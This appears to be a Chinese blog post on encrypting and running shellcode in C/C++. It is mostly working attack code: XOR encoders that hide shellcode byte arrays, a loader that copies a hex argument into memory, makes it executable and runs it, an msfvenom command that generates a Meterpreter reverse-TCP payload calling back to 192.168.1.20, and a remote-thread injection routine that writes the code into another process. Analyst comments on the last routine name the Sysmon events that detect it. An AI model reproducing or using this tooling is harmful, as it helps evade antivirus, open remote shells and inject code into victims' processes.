C/C++ ShellCode 常用加密方式
阿新 • • 發佈:2020-09-11
異或加密ShellCode:
#include <stdio.h> #include <Windows.h> unsigned char buf[] = "\xba\xa9\xb0\x07\x68\xdd\xc3\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"; int main(int argc, char* argv[]) { int password = 1025; unsigned char enShellCode[500]; unsigned char deShellCode[500]; int nLen = sizeof(buf)-1; for (int i = 0; i<nLen; i++) { enShellCode[i] = buf[i] ^ password; printf("\\x%x", enShellCode[i]); } printf("\n"); for (int i = 0; i<nLen; i++) { deShellCode[i] = enShellCode[i] ^ password; printf("\\x%x", deShellCode[i]); } system("pause"); return 0; }
另一種ShellCode加密方式
#include <stdio.h> #include <Windows.h> char ShellCode[] = "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"; void encoder(char* input, unsigned char key) { int i = 0, len = 0; FILE * fp; unsigned char * output; len = strlen(input); output = (unsigned char *)malloc(len + 1); for (i = 0; i<len; i++) output[i] = input[i] ^ key; fp = fopen("shellcode.raw", "w+"); fprintf(fp, "\""); for (i = 0; i<len; i++) { fprintf(fp, "\\x%0.2x", output[i]); if ((i + 1) % 16 == 0) fprintf(fp, "\"\n\""); } fprintf(fp, "\";"); fclose(fp); // 輸出加密後的檔案 for (i = 0; i<len; i++) { printf("%0.2x ", output[i]); if ((i + 1) % 16 == 0) { printf("\n"); } } free(output); } int main(int argc,char *argv[]) { encoder(ShellCode, 1233); system("pause"); return 0; }
ShellCode程式碼執行盒
// 生成ShellCode: msfvenom - p windows / meterpreter / reverse_tcp // LHOST = 192.168.1.20 LPORT = 9999 - f c - o shell.log // 去除多餘斜線: cat shell.log | grep -v unsigned| // sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g" #include <stdio.h> #include <Windows.h> int main(int argc, char *argv[]) { unsigned int char_in_hex; char *shellcode = argv[1]; unsigned int iterations = strlen(shellcode); unsigned int memory_allocation = strlen(shellcode) / 2; for (unsigned int i = 0; i< iterations - 1; i++) { sscanf(shellcode + 2 * i, "%2X", &char_in_hex); shellcode[i] = (char)char_in_hex; } void *exec = VirtualAlloc(0, memory_allocation, MEM_COMMIT, PAGE_READWRITE); memcpy(exec, shellcode, memory_allocation); DWORD ignore; VirtualProtect(exec, memory_allocation, PAGE_EXECUTE, &ignore); (*(void(*)()) exec)(); return 0; }
ShellCode 程序注入
#include <stdio.h>
#include <windows.h>
unsigned char ShellCode[] = "shellcode程式碼";
/*
 * Copies the ShellCode array into another process and starts a thread there.
 *
 * Pid: identifier of the target process.
 *
 * Declared BOOL, but the body has no return statement, so callers cannot rely
 * on a result.
 *
 * Analyst notes: the call sequence below is the classic remote-thread form of
 * process injection (ATT&CK T1055). Telemetry that records it:
 *  - Sysmon event 10 (ProcessAccess) for the OpenProcess call, which here
 *    requests the full PROCESS_ALL_ACCESS mask.
 *  - Sysmon event 8 (CreateRemoteThread), where the start address falls in
 *    private memory rather than inside a loaded module.
 *  - Memory scanners flag the PAGE_EXECUTE_READWRITE private region, since
 *    ordinary code pages are rarely writable and executable at once.
 */
BOOL InjectShellCode(int Pid)
{
HANDLE Handle, remoteThread;
PVOID remoteBuffer;
/* Open the target with every access right; handle inheritance is off. */
Handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pid);
/* Reserve and commit a read/write/execute region in the target, sized to the array. */
remoteBuffer = VirtualAllocEx(Handle, NULL, sizeof(ShellCode), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
/* Copy the array, including its terminating NUL (sizeof), into that region. */
WriteProcessMemory(Handle, remoteBuffer, ShellCode, sizeof(ShellCode), NULL);
/* Start a thread in the target whose entry point is the copied buffer. */
remoteThread = CreateRemoteThread(Handle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuffer, NULL, 0, NULL);
/* Only the process handle is closed; remoteThread is not closed in this function. */
CloseHandle(Handle);
}
/*
 * Entry point: calls InjectShellCode() with the hard-coded process id 1024.
 * The command-line arguments are not used.
 */
int main(int argc, char *argv[])
{
InjectShellCode(1024);
return 0;
}